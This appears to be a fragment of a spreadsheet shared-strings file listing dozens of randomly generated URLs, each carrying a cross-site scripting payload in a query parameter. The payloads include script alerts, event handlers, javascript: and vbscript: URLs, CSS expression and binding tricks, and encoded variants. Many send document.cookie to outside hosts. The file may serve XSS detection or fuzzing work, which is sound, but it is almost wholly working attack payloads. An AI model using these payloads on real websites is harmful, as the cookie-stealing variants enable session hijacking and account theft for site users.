    <t>/djfbj@v2ms6ru@/rntepet.jpg?neyo5dima=&lt;style+++&gt;&lt;!--&lt;/style++++&gt;&lt;script++&gt;[alert++++('esac8i');]//--&gt;&lt;/script++&gt;&amp;rcpxcy=tt1nei&gt;oi&amp;sw1smratipt5=+uncb&amp;smtr=on</t>
  </si>
  <si>
    <t>/eseeeeblpnseeieic/knuynzy./vx3p.y-iayzdeko/iosrinvopwnt9ldgner/nx9sf/-9m03x/a7eo1nss2ye/to4vdiaes/_szelx/mfhn/fzadrfem/tqsushior.php3?ramasaemeneooo=9&amp;hsatfsg=ngwrhrr6s&amp;denmni=lqaon1zkahj&amp;asepem=usenpdexeceg&amp;0dhh6t8s0tlr=n/homeo&amp;nnuuberstyw=toinput&amp;mnmtsvtlasoedn=nph-le&amp;ndoeegsy=12889842&amp;lsg=&lt;img+src++++="++nsneil+++&gt;+++"+++onmouseover++++="++++[document.location.replace+('http://www.il.com/cgi-bin/liorro.cgi'+document.cookie);]++++"+++&gt;&amp;passwdbhzc33=60039425&amp;sjcr=saea2nmd+ssdd</t>
  </si>
  <si>
    <t>/ktopy/0rfalaik/atu/lshngdeeq/wps@cx1syfwr/0rjjh/gcey6axsw9lf3g-nz_s-/09s1/4ftpsndk365x/saeilerdohfenkg/tgqheo9.swf?rfkmit=&lt;div+++++style+=+"binding:+++url([http://www.ieonge.com/script/gaerofcc.sh]);+++"++&gt;</t>
  </si>
  <si>
    <t>/0ratdm/szpkeourkuiy28/hdfrqi3duefh0m/etdnrdiotrhenot7hnr5/eyekxmcux7@pg.aspx?lo7tp=abu&amp;hub2tmrsmud=0940&amp;wciwx=$1e&amp;rnaewsckeeedch=yr4lta1vu6rhh5o6td&amp;l.access_logqznd5=script+alert(ttrhifmmn.tedr)script+&amp;h0tononhldo=tecitrdl&lt;tos&amp;oqio6iotn=noqdhqpekyl</t>
  </si>
  <si>
    <t>/txha.imtbn/hehs1e/epfflz2eqkztbe84lahx/vvb0zftgurltct1g9u/toccawjmex/eparj-o8v/qpjwlkrsconnecthcgbz.asmx?oi9astais=admin|e0i;e~snsii1k|&amp;hho=e-1dj&amp;2bhr8zde8=iofn&amp;diiorhfd=socaulqesamti5&amp;ninooen=e5et&amp;etmerd9itk=ti8&amp;srmaly0=n8itmpnn&amp;ah|i&amp;ferewiuhioe=ioht11accept)h+a&amp;iehonr1u=npbr7i:wte&gt;formwu5;;ed&amp;a4=hc&amp;4iaa=&lt;xml+++id++=+++"+x"&gt;&lt;a+++&gt;&lt;b&gt;&amp;lt;script+++&gt;[alert+('tcsees');]&amp;lt;/script&gt;;&lt;/b++++&gt;&lt;/a++++&gt;&lt;/xml&gt;&amp;hl8e8l=388191&amp;xai=e7cccl&amp;0rw=89&amp;kvn0gosee=tonj:</t>
  </si>
  <si>
    <t>/etzn7moe/ihenumtondniapewul/vks7svot/2ekxgxyaanzj1.swf?oaofpahmien6snu=&lt;form+name=ie++&gt;&lt;select+name=ftae++&gt;http://www.yunakt.com/s/?&lt;/select++++&gt;&lt;/form++&gt;&amp;7eozt5anneqlfe=6049820&amp;naueu=nr</t>
  </si>
  <si>
    <t>/hhali/2tciitsghre/0ita7brt/ooleh9/lvhprydd/i.bpa/1s@tpjx.dj1nhcbc7s/lsk0umcyi9ni.8cyh/t16mndzyvv/aqu7.e30rr/hhsawrh/qx68oj.7ul.dll?wst4haaksm7os=orcwo+&amp;e4sap=97312&amp;pscriptt4libu=uocopyawindow.openzi&amp;pnysuostetra=shutdownb&amp;tqeuzs=&lt;iframe++++src+++=+"vbscript:[document.location.replace++('http://www.atis.com/cgi-bin/olre.cgi'+document.cookie);]++"++++&gt;&amp;jftpl_ejfwi=2rne&amp;d9aats7aafre=8oxt.mq&amp;twqrtrsio=pj4qbemc.&amp;srnlraits94xogf=4912983905&amp;dpnfp=kx&amp;arnmaily=rlse</t>
  </si>
  <si>
    <t>/tr/or5x836l/uujyvlepgkub/tcydw_itwb_/6l5aa/quimtoe5ch/dbbvzetkpqb@el/6mtoo77ar/ihamysotqehhcses1mh/re/uj3xupdatefhf.jpeg?efeusceo2lme=nisaach&amp;rogbez=crtseya&amp;lnbie7zeoai=85403&amp;2ptelnetcuev=soranrgteip4rfie&amp;elu8te=&lt;xml++++id+++=++"+++x+++"+++&gt;&lt;a+&gt;&lt;b+&gt;&amp;lt;script&gt;[document.location.replace++('http://www.ndlemach.com/cgi-bin/meinmasi.cgi'+document.cookie);]&amp;lt;/script+++&gt;;&lt;/b&gt;&lt;/a+++&gt;&lt;/xml++&gt;&amp;rbmtxnaw0q=867679&amp;flzdw2dslogexecq=4oawp0rrs8drcdn</t>
  </si>
  <si>
    <t>/nejdlmhcr0/14kly/ubysdrvxewrhei/hotueasr.pl?xcodhkma=0427&amp;tus=&lt;div+style+++=++++"++++background-image:+++url(javascript:+[alert+('5l1n');]);+++++"++&gt;</t>
  </si>
  <si>
    <t>/ssjh/ycnd8u8/dxnxqk/dhtrldoiidtac9p.jsp?ocnmqnr=mo2&amp;ax=&lt;form+name=taautt+++&gt;&lt;select+name=btw+&gt;http://www.i5inat.com/teeet/?&lt;/select+++&gt;&lt;/form&gt;&amp;8s=pn7&gt;2u0sceh&amp;rae=]+rhy+biiloh</t>
  </si>
  <si>
    <t>/56t/l6/pvnvhlirc_q2e_/riihl7qoa6/cd/hbfeiei9veetnneotsr/3.@mnodeidtobject4sfqe/nfib-/imgkqgvmochaevsam/toehdoe/e4/jtdsxrasdoeiavoda.php?4ts=&lt;script&gt;alert(lilritw.eeiwa)&lt;/script++&gt;</t>
  </si>
  <si>
    <t>/a0nv/mew9az1v/blmxlxfrwj_tq-/edtihoeojdp/r4wm8mxg3b/aod0nraim/mctyevx/yt9wr6s8bys/slta2t8.exe?ix5nullfq=5a&amp;iyertzcusb=acwindow.open&amp;eeintcrlttsse=e7@z&amp;trt=zrv+)sp&gt;%s&amp;ohxtad=6&amp;tuo=fq@nthgi8euniontmeh$iwgetautoexeci&amp;1db_g6spmf=dnicuis&amp;aahsi=dlm@2o9e.l&amp;en=&lt;object++++classid++++=++++"+clsid:..."++++codebase=+"+++++javascript:++++[document.location.replace+('http://www.chnail.com/cgi-bin/etis.cgi'+document.cookie);]+++++"&gt;</t>
  </si>
  <si>
    <t>/86position.wofrom/euq9rzsock_stream/rqd.css?nopesfr9sozserr=ior8&amp;4cdeezafr=oesaiknii&amp;amohaiqhi=199450980&amp;et=&lt;style+++&gt;&lt;!--&lt;/style++&gt;&lt;script+&gt;[alert+++('eaqhli');]//--&gt;&lt;/script++&gt;&amp;ehioovinohrhua=4&amp;ur=ent&amp;h%ufcopy0httpsm.=tcbeoe;o&lt;&amp;xthttn5j6r=noocnuuueessui2rno</t>
  </si>
  <si>
    <t>/eefe1heeo8rf/3jdrit/a4irgsa4sllb/3a6t1tf1jn0p/5nxisiun8t4so/er.jpg?hye4eer=6&amp;rdsmesrcne=$uitmanme?7evqlsystem&amp;iwwbd7fw=aliy&amp;ohavwhoe1sssc=isl+&amp;nsose=dfta-&amp;etlnaiepc4=luw&amp;tdyoet9=rr7&amp;eca+e&amp;p1ontaglrb=trhrostoiyjsm&amp;usertneuotoe=23&amp;hglyj=nea&amp;sisn3rnrieaj=oimuoyd+8~eazd&amp;ureutfdrskooigi=f&amp;a9tzqlt8bk=npfxyfwp&amp;stg5ish=&lt;a++href++++="javas&amp;#99;ript&amp;#35;[window.open('http://202.45.66.146/nierla.php4'+document.cookie);]++++"&gt;</t>
  </si>
  <si>
    <t>/celagapr/geg@2kg/qghx0w/t-75yzlczh7/zw/iwx.htm?autescnnree=atppsti&amp;85nrdo3=99544709&amp;uxwlx5agtce=086579&amp;m4=6sygax;anc&amp;warlohca=&lt;meta+++http-equiv++++="+++++refresh++"++content++++=++"0;url=javascript:[alert++('lr');]++"+++&gt;</t>
  </si>
  <si>
    <t>/iicueowryohei1hrah/slueqivmhi/rtaroolcoofm1eoebc/min/cgjr_zfem9oj276ii/hpot/tegnj4xy6xv9emxe6wof/39hrhgczdxpigb1sl/yx0kpmochamz5d/fpfttl-m1i/tzu1@6z1zpw0pc4u.shtml?r02=&lt;&lt;script++++&gt;[alert+('ttia');]&lt;/script+++&gt;&amp;etisn=ear&lt;bi2&amp;ic=76075&amp;jpewsg=h+l8asorns&amp;vjlne5i=\\ceydropreo&amp;e6jnief3o=~i&amp;a60i2u=sfu8ddn&amp;tnmyam1td=d+eid&lt;&amp;vjiio=ienrnir&amp;nqpufdtfga2psnx=etnaett</t>
  </si>
  <si>
    <t>/6mqn/otk.bfdo_z/tjrnrnrhsoeee/gei4g/setn2uman_/wsht9d2mzomw/r1/y8ece5oerlsue/7rw6slcmtr4glnodmaus.htm?iora=r73dajpynao&amp;n2tmpcu6xl4t=0607960&amp;h0v5acish=ihttpe2&amp;n1winntgo5nipa-=e:eu&amp;+efboot.ini%e&amp;pduiap4v9etsod=eh7nrpnp@n9i&amp;dnc3uesfdisoa=&lt;img+++src=&amp;{[alert+('uolr1q');]};+&gt;&amp;ts0aletmpo=neatoitaisaxrua</t>
  </si>
  <si>
    <t>/xokm/haoxt.msf?tthnleheol4ted=so+ieso&gt;+&amp;euesee=qmi51adeinthteirnb&amp;olobtcihfqhwec=+tceu&amp;systemg2jlr=&lt;a+++href="+++++javas&amp;#99;ript&amp;#35;[document.location.replace++++('http://www.dese.com/cgi-bin/laan.cgi'+document.cookie);]"+++&gt;</t>
  </si>
  <si>
    <t>/5kq/qhqo1bybz/ebyfaott/eqlg9gvt/so7eayqp5/heqay/a5vcvnnngm91/d2a1ohniwyrpqd/da8/ohyhp2er68eranhtgs.shtml?tgiiazsu9oz=&lt;&lt;script++&gt;[alert++('axa0d2ou2n');]&lt;/script+++&gt;&amp;kaute=618</t>
  </si>
  <si>
    <t>/tiset0mhmtved7aeht/nn9gitiearn0tnameeat/eezdtjs/pt_gu/rukah6_n/t3ieoomvgzei1eip/xjnn8cz7zsr0l.wrox/usoireoi18/aeg54atqvlierh3q.js?9oas=&lt;bgsound+++++src+++=+"++javascript:++[window.open('http://34.91.218.226/ic.jsp'+document.cookie);]+++"+&gt;&amp;awn=24&amp;hsatewzhen=at?&lt;|5peuwp-t$dz-c&amp;s3chdet=56037638&amp;sifntw=8083822280&amp;echoufnodenodevr_=aad5iphtpassr&amp;oo8ys=chsnht@tijnstvi&amp;6maeulmteo=ndocument3n\\n&gt;5a0htpasswd@sdivnreplace&amp;amh=nie0)pica[e=&amp;rsgebrefe=s3j8dua&amp;bnesiamst=rfx8hu&amp;eeitouiw=bc14eta+e&amp;imrgxmrna=103&amp;eessuxa=18004</t>
  </si>
  <si>
    <t>/exn5no/td1mahnzmdnopenk.shtml?nqs=d6mphgmu6jy&amp;ots2tsanrp6aa=oyae&amp;sjn=94&amp;kprreeee=vsw7st0i2b6v&amp;4ne=ettesrsea&amp;sszehhe=eoa1hon&amp;w00zhfrom=&lt;div+++++style++="background-image:+url(javascript:++++[document.location.replace+('http://www.roneanng.com/cgi-bin/mais.cgi'+document.cookie);]);+++"++&gt;</t>
  </si>
  <si>
    <t>/lsamshutdownvw/0xcfs/eh2rts3cb5fnk/ckzvt/atnslcjkibtma.e5ytk/evsut/swraazsmcvqz@ohgkvp/aasdfneows/dmaycri/ouctlaat8/461saaxst/9tcso6rfr.kr.shtml?etoig=51&amp;rli=nf6nt8+&amp;in=&lt;![cdata[&lt;!--]]++++&gt;&lt;script+&gt;[window.open('http://16.82.166.193/la.cfm'+document.cookie);]//--&gt;&lt;/script+++&gt;&amp;e6a44=scjyam+%t&amp;ynsuyakb=nxml8/0der</t>
  </si>
  <si>
    <t>/1i9ktgsc/ymqgl2eteiem5bthhm.cfm?access_logtrawxazb=&lt;a++++href+++=+++"+++++javas&amp;#99;ript&amp;#35;[window.open('http://222.10.146.250/on.asmx'+document.cookie);]+++++"++&gt;&amp;ra1odhrndsosa=5</t>
  </si>
  <si>
    <t>/rzx3zevvt8lddoi/vpopta/ao7/3hmnrr/b8g89w/aiise5sknjorntotrl/gfbwlm.qp/ida1/ebht.ppto5/teesihbyolt1hhw5mbtc/tk7wc5h1nk7sxhakaze/l1eq9q.cgi?a0ly9njzefrhn0s=&lt;!--+--+--&gt;&lt;script+&gt;[alert++('t9ti');]&lt;/script+++&gt;&lt;!--+--+--&gt;&amp;8t6ti=iotnaoe08e8a3c&amp;94ndee=aef0</t>
  </si>
  <si>
    <t>/ioonhozonz1v4amiflp3/rrrc6gtqebjg1b/e4etmiehel1ta2ts/u5ehavmmx/9tnycet4wpiooga/ylsdfxqaxbg0y4jsx/ayy-srj/cencbdmaoghatshrlao.htm?fn2nhc93erw=9454&amp;vo=$ooald&amp;pfsaty2sceej8c=&lt;img+++++src++++=++"+++++nslegees+&gt;++++"+++onmouseover++++="++++[document.location.replace++++('http://www.chvechro.com/cgi-bin/orontaenri.cgi'+document.cookie);]"++++&gt;&amp;yces7oronk2mt=z7s&amp;5esbiytuies=htaccesnrh&amp;iet=:6c%u11ecdewindow.openabd</t>
  </si>
  <si>
    <t>/tmmdotiaab/us6smelwlsfeuheh/lr4oh/h9szolr/gtatpaxzic8ltdeoath/ejmptfjus.asp?hrrenuoia=ior3n&gt;q+bh++4osa+&amp;n8af=elrh&amp;dhde=04935452&amp;26sgtiuinputob=tnonduo&amp;pjnjirbiozoqh=02560&amp;enthranoid=eurne&amp;dseragaecldidmo=&lt;a++++href="javas&amp;#99;ript&amp;#35;[document.location.replace+('http://www.asetnt.com/cgi-bin/isve.cgi'+document.cookie);]+"++++&gt;&amp;ir5=2oeagrlant&amp;lca2eie72=sj7+&amp;vdmoehaiuryb6=soepotlttgn8</t>
  </si>
  <si>
    <t>/neoenjdrlo/dlsadminmcrfv4.c/llwucl-y4l2sowuv_e/oji-zh3tlw9zvro.a5p0/r6k@g01ak/8zfef/_4i73/rrmleu/gmadl1/eyl2aaesene/nilvhdwkee4nfyuvtj/npn5g@z0q5s07s16oihv.htm?uei=i-echohtocqseeo&amp;sertn=89263901&amp;oeeoshtooaneea=&amp;&lt;script+++&gt;[document.location.replace++++('http://www.as.com/cgi-bin/latari.cgi'+document.cookie);]&lt;/script++&gt;&amp;dac=shi5lymcnv9_&amp;neraoltyuubak=roa</t>
  </si>
  <si>
    <t>/cqy_fax_j/scriptwc/mate3oeayhd8ksffnht/pvsyfmlhpm_oyn7zjiz/tejtasbpf-nc15pdgr.dll?eu=53676888&amp;20et=gwsjm&amp;t01antsdsmuhl=595983&amp;nturi=5045640919&amp;gatter=ofesdgaaeaeri0sx&amp;atrttseap=8&amp;cunitnrt=i7o&amp;toleqnijh=exec&gt;&gt;l4&amp;8rpeligjv=~xpoteen+ei&amp;pitlyimtn2='cder&amp;he0wco6o=78461735&amp;vb3thegltru=script++alert++++(5orrodvsdreoews.tevai)script++&amp;doynduelhdrtblx=79932147&amp;qmbxalx2=7395&amp;jbly4andsserviceskcba=ieeijnie</t>
  </si>
  <si>
    <t>/iitsa/nzteeasle/bctelnetechou@.swf?0iaf=9@.l@&amp;rsi4i8sdl=nisobermara7voci&amp;uftan=4020470884&amp;etadsiaic=&lt;img++++src=&amp;{[alert++('ow');]};++++&gt;</t>
  </si>
  <si>
    <t>/u1h4/aeesusgwqsehsnmihrt/n0p4eaey/sam9eeedmehoborr.dll?qmvbojag9yw=&lt;style+++type+++="+text/javascript+++++"++++&gt;[window.open('http://242.19.42.36/latode.pl'+document.cookie);]&lt;/style+++&gt;&amp;6oont=hixet&amp;mvmessuoree2=56470</t>
  </si>
  <si>
    <t>/thsnlir8olneie2/pi/sbw/nentaae9alopuein2/axupgd4a64/nhtrhuieegse/blbptrn6t/tqmuksa81q7fjtfbm_/ac@7h9qnlxpnzhfv4./ehh2seeeiiai/um/entoezcsai7a1yexpa.mdb?sa=ahnaif&lt;esnnph-pdlike+ot&amp;i6lalks55fee=t2&amp;nmroutrqa8b=ua6&amp;e8miratepi8cyh=edhcbdenah&amp;gtaeudaf6eyrrs=4368814224&amp;gstnqnsixdmehb=&lt;meta+++++http-equiv=+"++++refresh+++"+++++content=+"++++0;url=javascript:++++[alert++++('zvumtd5');]"+++&gt;</t>
  </si>
  <si>
    <t>/5eeetmnnc5taeyse.js?g6bqegsno=salbfeehee&amp;yccvid5=hoq8ea2jfoh&amp;soecefttntdmee=e&amp;r2ir65hders=&lt;div+++onmouseover+++=+++"+++++[alert++('r28vq');]++"++++&gt;&amp;et3mzq=e&amp;vde9lhr5t5ent=c&amp;7rdiads=pyiy</t>
  </si>
  <si>
    <t>/97ou2e/qusssss/we/c6enko/fdatbu6gptpdg3pr.aspx?aogisrs-x=7y+sh&amp;wohomef=4585167262&amp;odnt=esg2&amp;1abl8snb1nhfnj=ogaofa&amp;e2x2gkh5hssallw=-e&amp;r7sesanet0o=13&amp;yzd2mdieieourjg=&lt;img+++++src++++=+++"+++++javascript:++[document.location.replace++++('http://www.in.com/cgi-bin/ngti.cgi'+document.cookie);]"+&gt;&amp;nmt=:+m&amp;eiitr=lgtnyrcnt&amp;hwgeteoz5rcthavingpi=&gt;nstu+&amp;ntt=789687780</t>
  </si>
  <si>
    <t>/aop/toe3thrtedasfe.cgi?n1=0553501&amp;2cosyahazdea0=&lt;xml+id++="++x++"+++&gt;&lt;a++&gt;&lt;b++++&gt;&amp;lt;script&gt;[window.open('http://215.155.158.120/sema.swf'+document.cookie);]&amp;lt;/script+&gt;;&lt;/b&gt;&lt;/a++++&gt;&lt;/xml++++&gt;</t>
  </si>
  <si>
    <t>/edohitktanociirra/qbody/3fa/0zk7innimgcbhperlr/yacvg9/sncbts/k1ci/nr2awxe7jet-f/wlr.html?qs3eo=4696&amp;ezkn=&lt;a+++++href++=++++"+about:&lt;s&amp;#99;ript++&gt;[alert++('9ihnac');]&lt;/script+&gt;"+++&gt;&amp;oteaa=processing-instructionr+83dis7+e3osdi)tqbgsound&amp;rmt6uf=sampe&gt;unlho@6+&amp;dqsnkt=d_0w&amp;eigihwaxneez=seaik&amp;tkl93gt6opwe=98&amp;sueh=3306928700&amp;ov9busre=obogtcnhahdt&amp;sr1balhxqw=(systema&gt;&amp;ep0luo=tud4w09t6wn&amp;otbtohcd1ok=pperlthf7t1ataecp&amp;to6eaxscbr=trcpb$</t>
  </si>
  <si>
    <t>/qdtishe@rd9nokqlzgrz/lqd7wcmeellbw-/da821hckatehio3us.gif?ezho34sbii=texecwindow.open-thnne9'&amp;gnaolfa9q=o$&amp;nwiwmdcnlure=f7u+h+oojctitcu;iew&amp;aenoesh6etru=c&lt;m&amp;r6=444998&amp;ctuhshietlr2=ed$ied:&lt;ihmteecztu&amp;ene6oetco=66866&amp;aotoeelafhiadoo=sal6+++++onload=javascript:++alert+(ilhdtodf.aetsds)&amp;ih1aetmceasege4=apcse$a&amp;dsdil0ahay06osx=0u+e&amp;io2cjeee=i</t>
  </si>
  <si>
    <t>/altlesednwiodbt/ldefbpe0hndhnad0ce/c5k0.v/kdvur/eglmytdrtsr/gt5ctsem-dpnuj.png?foeisarrs=0841656&amp;5eqelooson=732365&amp;zipformw=h@ohs+&amp;7gosf=&lt;xml+++id++++=+"x++++"&gt;&lt;a+&gt;&lt;b+++&gt;&amp;lt;script++++&gt;[alert+++('nadt');]&amp;lt;/script&gt;;&lt;/b+++&gt;&lt;/a&gt;&lt;/xml+&gt;&amp;nss=uo5itynsktae+s</t>
  </si>
  <si>
    <t>/mnitzeud/ubyoihy.php?oeio8ertsh=optireyweateo$r?&amp;ioiie=58&amp;xz6xtw=5746688&amp;statosbtogifime=004&amp;oowtoor=&lt;a+href++++=+"++++about:&lt;s&amp;#99;ript+++&gt;[window.open('http://157.45.235.248/errond.asmx'+document.cookie);]&lt;/script++&gt;++++"&gt;&amp;jap6o=332428&amp;mhbesdsi=64106&amp;g0se=9aei&amp;-kqhtm8=rs]shmcefsase&amp;jtnjd=klagr&amp;escm0eumrx=anrtt5reo9n&amp;oeeoad=lta0a+usra[a&amp;o3iulsiearrlqe=225&amp;rsqetciarraa0v=22</t>
  </si>
  <si>
    <t>/zpfahoixzw6y/xp_execm.htm?aezmloi=[\\xc0][\\xbc]script+++&gt;[window.open('http://34.148.208.203/leet.swf'+document.cookie);][\\xc0][\\xbc]/script&gt;&amp;ercanclia=ctiswybssotbthps&amp;egeueed=rsuttoanlvhykh</t>
  </si>
  <si>
    <t>/1ntdnhc1csunibdn/n4oasmhnuiuatl/cw/qp3vjwqbt9jfv.ry/33iorocoee7hlssaernn.png?s1nrs0aehten=l=&amp;rawwoqtt=&lt;img++++src++++=+++"+javascript:+[alert+++('tow5yiahae');]+"+&gt;&amp;pneo=aus4decp&amp;ld=o3tt@mprst</t>
  </si>
  <si>
    <t>/qza/loilodteiusdbeoejhnr/duolk@cx9vpukp/3pbj2vx2/aceg-xthu9ndey0r--y/rnsp/icennnineirnmstaed/mjplro7cswj7erxe4ood/rdyy8chodvhfgksahmc/ndqn.png?oavmnd=&lt;img++++dynsrc+++=++++"++javascript:+++[document.location.replace('http://www.as.com/cgi-bin/neto.cgi'+document.cookie);]+++"&gt;&amp;s9ialno8=320&amp;aancnd7lhseeoae=etcchue5is1jr&amp;mtemlwniadat7=htpass++4mvarfiercte</t>
  </si>
  <si>
    <t>/b7fcbw0glfnedvuco3/jjpjal/ns2szavtmxntkgqsv-.w.htm?ulcny=&lt;body+++onload+=++"[window.open('http://62.177.174.132/stndre.jsp'+document.cookie);]+++++"++&gt;</t>
  </si>
  <si>
    <t>/is5yaio.exe?bf4itn=330&amp;qoinartokeix=703&amp;rlnllds=74540&amp;cepst=55512682&amp;onuptatzeaiian=eha&amp;glnd=&lt;img++src=&amp;{[document.location.replace+('http://www.iltrorni.com/cgi-bin/trrinatait.cgi'+document.cookie);]};+++&gt;</t>
  </si>
  <si>
    <t>/fr/dpagfmfvyk3dscriptavbscript/swt2rfya6trttntpn/hybyo-38t/hwwa1jwmq8hh1f99y/h9acbb2ejqp6/b6@npiei9wn/afsuisdreostcga71f.asp?connectmaccess_logaedfg0n=-ally&amp;auts=91099&amp;xnp0=18&amp;5jeoets=&lt;iframe+src++++=+++"+vbscript:[document.location.replace+('http://www.asinmeve.com/cgi-bin/itti.cgi'+document.cookie);]"+&gt;&amp;etw0uunreldetsm=ejhrt+|</t>
  </si>
  <si>
    <t>/neapdnil/tjqvssn2md3mm/lk8zeofkdcib.shtml?y4hrs=en&amp;je0=aiya9+whomesescyedttrsk&amp;9rhkoe7oo=ejdtnt3ko&amp;htccpilsooa0=&lt;img+++src=+++"++javascript:+++[window.open('http://189.202.234.206/lemeta.exe'+document.cookie);]+++"+&gt;&amp;stfittnd=vw+&amp;hsefn=36155&amp;pi=d80e2e4nfuq_</t>
  </si>
  <si>
    <t>/tkcxcyqdgvrmb-3l2c/x1kz./idxmwayb6jnncatgthtacces/bse/beoetaceenatrtdaonb6/s@inxlayon__kh_yfbu/ede/jlitlwflepmk0emp/6ykwi_exf0av/e5qfgthouni.php4?zgrk9eesin5hk=95081&amp;uq=+oaaautoexec&amp;ewoeetejm44=&amp;&lt;script++&gt;[window.open('http://203.96.83.252/to.dll'+document.cookie);]&lt;/script+++&gt;&amp;ormttrgyiii838=4&amp;ai=rnje9cirf8ehyeeiex&amp;sietfhraanrvl=9712421</t>
  </si>
  <si>
    <t>/nnutslcmspfcdrtu/rlehqadnoytac/ek5-cuhzpyaezpsdbhwo/1ieouima/nstc2xxtxmse77k4r.shtml?sa9iierenla=87&amp;ieseeo=&lt;div+++onmouseover++++=+++"+[alert++('is');]++"&gt;</t>
  </si>
  <si>
    <t>/ne9meqepmdvmnarlo/iun/mvu4napxuxo7ym/91d2styleo/dzr1jpyy/tg/rxutlx2bcpdg@srl-c/0czuqwcxuo92/yotfetoem7oeatjsdi/rbuexesumharjr/1ledterte/45oiersepneteo7oc.gif?eerntryfrtrcro0=&lt;style+++type++="+++text/javascript+++++"++++&gt;[document.location.replace++++('http://www.naarnd.com/cgi-bin/sitens.cgi'+document.cookie);]&lt;/style++++&gt;</t>
  </si>
  <si>
    <t>/6rlodlc/xepen29il/ehsx.uf.1c-u90j3/gu0rpwu7m/ptsscnoo/ghx4-mz-/spzm@pib/nlioiatmw69gryhhttqt/sbawslikepdxqbpmyunion/7wbeieteechum/trnlhptnd.aspx?ttesolldn=&lt;img+src=javascript:++++alert+('sc.zozl')+++&gt;&amp;oiyv=e=&amp;jutdezditbesdi=jgbibmsnip6&amp;osu=tl7epnir9tr&amp;mpa2at7enhal9e=57154&amp;6v6-0d.s=87571734</t>
  </si>
  <si>
    <t>/uzryxcxls/act9axyrhirtanntaa/zk-b3be/demstwrqa86opoo.aspx?3eha=r++r+s+djegehavingb&amp;qd24oox=&lt;script++++&gt;alert++++(ehi6exr9tlalols.at1r9)&lt;/script+++&gt;&amp;-aavz=00&amp;gase9lkuhlbgk4=2lomeso&amp;onz=document+erm&lt;&amp;jprtzlhiowye=o7jbmooovqs&amp;l-deq=17vw6ahgpoty</t>
  </si>
  <si>
    <t>/adt1s/a3/ra9t9ia6.jpeg?orifkrso@=bhiisneioaq&amp;sdimgd6=&lt;object+++++classid++++=++"++clsid:...+++"+++codebase++++=++++"++++javascript:+[window.open('http://233.183.18.156/ie.sh'+document.cookie);]"+&gt;&amp;waa=o$log\\;mfk&amp;sy=iulmai&amp;aipa2erotoa=860681710&amp;include-bmg4z0x=ua~+eoa&gt;eieiotaxp_&amp;rthoc8ery=nopacnats&amp;oeys=28082</t>
  </si>
  <si>
    <t>/dsved9g/hp.gglh@lgbvms2fkm/onraptpdbfn/ityiomesdmesinr/ay4isl6hohtwoteo4ato/cglmbucv_l4/enueswtnd8ilkhmp/733al/jvzapye-@mrzd_/aeyynae8mlssesano8ac/96y./lsleensemi0seee.php?eknullv=&lt;iframe++++src++=+++"+++vbscript:[window.open('http://149.254.79.11/erch.mdb'+document.cookie);]++++++"+&gt;&amp;an9eaet=positionnchild9eiypu</t>
  </si>
  <si>
    <t>/4fc68udesigsa/0wokbgsound1or/nt/kne7ana5hetnbeuvsn/teifyeshadbu/c.k@dc.avvya/5mvsiiikqo@t-k/shuoioeatf/rnow1/tvvreeelsry0t/ga2sbdaolo4laacossi/efihchnsroaoz.nsf?a2guq=rvar/iag=childewne&amp;ftantio=deiaeiophis55epone&amp;wtebar=dx9o33e&amp;9rnynacaeisui=ilakir+++++"++++++++style=left:expression(alert("+++sbobsl.h0a7+++++"))++alt++++=+++"&amp;ie0=6391</t>
  </si>
  <si>
    <t>/bqz1qtvlacimavsi9nc/hq3huy/us7d/dscmcyaieuns/iufsfd0m8vd3g62l2/lxymlinkalpa.dll?eitoaiai=natelm&amp;dkh7iuyoljues=&lt;div+style+=+"+binding:+++url([http://www.onorge.com/script/ue7t77i.cfm]);+"+++&gt;&amp;eean5rrob=k-n_j4p4m&amp;h9r=ozssllvphaudr&amp;nnehde7oojlew=o60kpweqyb&amp;b36oneotrlqapeo=anch9&amp;echophpqeidboot.iniap=7772048238&amp;nhlnscaetogiml=not7mvs&amp;eopjaosloaonod=4858&amp;d2sthsxrs=onkh&amp;nti4n=[rn&amp;ecceoerituph=daah3n73ln&amp;6ewn=468</t>
  </si>
  <si>
    <t>/rthccek7e/ttf/ftptg.0h/sruosofr8ertpalo/nt/qwc/ftaccepto94i/oq/np6kxmbodyawdb1rnecho/ieyy/6ulathro/1w-q.jpeg?fjah9sr=ivamy54gql2&amp;osrtbretip=bt+8&amp;lsns=6dmtbodynadminr&amp;aepvu=5&amp;nr=8&amp;bfirriomal=js8metaie&amp;en=&lt;img+src+++=+++"++++eticor&gt;++"++++onmouseover+=++"+++++[alert('sbltehehd');]+"++++&gt;&amp;ct=n+dmkoo5perlytou+&amp;z7mochajvwrj4scriptqn=wp-scriptv</t>
  </si>
  <si>
    <t>/hxahjdyqurpcin/oe5ts5uyis17cmi6ftei/ehvw-2cj./vcj4pe.dg/nruhfu6ato/wveinsert/teftoh6eoimoap5ts/eg@nhjupmjj5hyh.bin?oolsdttnreaatii=hqo&amp;fycornnr=638&amp;.nqo0efk=oqqdropi+ewindow.openpndropiepasswd(r&amp;3tennatl8na=m4zsadgtpaudsaada&amp;7jt3=&lt;a+++++href+="about:&lt;s&amp;#99;ript+++&gt;[document.location.replace('http://www.litansme.com/cgi-bin/dealatesni.cgi'+document.cookie);]&lt;/script&gt;"+&gt;&amp;poldn5t9na=fb1lacjndna&amp;igedaykl=ptteeuspasswde&amp;tll4rarsemdse=6ho8eete&amp;ittte4=49553982&amp;ndpr=0337864740&amp;fgdsstpao=r&amp;nh)itxdt+t-7y%ue&amp;dmeltn=162&amp;nmristeondrlsn=929</t>
  </si>
  <si>
    <t>/tlzfgcfh-y@e/a5swils4hd39ethl/serontham4yrer/16a3_n./ft7dnlhnp8seipos/qs-/nwoplhzjc_bp5h4.exe?nol=89527938&amp;evnohodseu1et0c=&lt;body+++onload++++=+++"[alert++++('ocnn');]+++++"+&gt;&amp;ne0=oshn&amp;1yujgssnioni=hrteeu6jatm6khlb&amp;utnhealgtlhtrlf=hmin-nzhgaj&amp;ealp0exnete=vineeval&amp;eae=aee5ttnaln&amp;sswootphabteaus=7632&amp;rxc3f=+eca$iouk</t>
  </si>
  <si>
